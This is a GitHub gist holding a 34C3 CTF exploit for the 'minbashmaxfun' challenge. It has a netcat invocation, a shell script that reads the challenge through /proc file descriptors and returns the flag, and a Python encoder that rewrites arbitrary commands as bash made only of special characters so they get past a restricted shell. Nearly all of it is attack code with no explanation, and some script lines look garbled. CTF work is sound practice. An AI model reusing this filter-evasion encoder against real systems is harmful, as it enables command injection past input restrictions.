Skip to content

Instantly share code, notes, and snippets.

@eboda eboda/doit

Last active Jun 13, 2018
Embed
What would you like to do?
34C3 CTF minbashmaxfun exploit
nc minbashmaxfun 1337 -v <<<$(python solve.py file dump_flag.sh )
#!/bin/sh
tail -f /dev/null | tail -f /dev/null &
PID2=$!
PID1=$(jobs -p %+)
tail -f /dev/null | tail -f /dev/null &
PID4=$!
PID3=$(jobs -p %+)
#echo PIDS: $PID1 $PID2
#echo PIDS: $PID3 $PID4
exec 3>/proc/$PID1/fd/1 4/proc/$PID3/fd/1 6&3 &
read <&4
read chal <&4
echo $(($chal)) >&5
read flag <&4
echo $flag
disown $PID1 $PID3
kill $PID1 $PID2 $PID3 $PID4
import sys
# see README for details
def encode(cmd):
def conv(c):
""" Converts a character to its octal representationn """
m = { '0' : '$#',
'1' : '${##}',
'2' : '$((${##}<<${##}))',
'3' : '$(($((${##}<<${##}))#${##}${##}))',
'4' : '$((${##}<<${##}<<${##}))',
'5' : '$(($((${##}<<${##}<<${##}))#${##}${##}))',
'6' : '$(($((${##}<<${##}))#${##}${##}$#))',
'7' : '$(($((${##}<<${##}))#${##}${##}${##}))',
'8' : '$((${##}<<${##}<<${##}<<${##}))'
}
n = map(lambda x: m[x], list(str(oct(ord(c)))[1:]))
return "\\\\" + ''.join(n)
res = "{"
for c in cmd.split():
res += "$\\'"
res += ''.join(map(conv, list(c)))
res += "\\',"
res += "}"
return res
def encode_file(file):
lines = open(file).read().split("\n")
payload = ""
for line in lines:
if line.strip() == "" or line.strip().startswith("#"):
continue
payload += line + " "
if not line.strip().endswith("&"):
payload += "; "
return encode_cmds("eval " + payload)
def encode_cmds(cmd):
sys.stderr.write(cmd + "\n")
res = "${!#}<<<" +encode(cmd)
return res
if sys.argv[1] == "file":
print(encode_file(sys.argv[2]))
else:
print(encode_cmds(sys.argv[1]))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.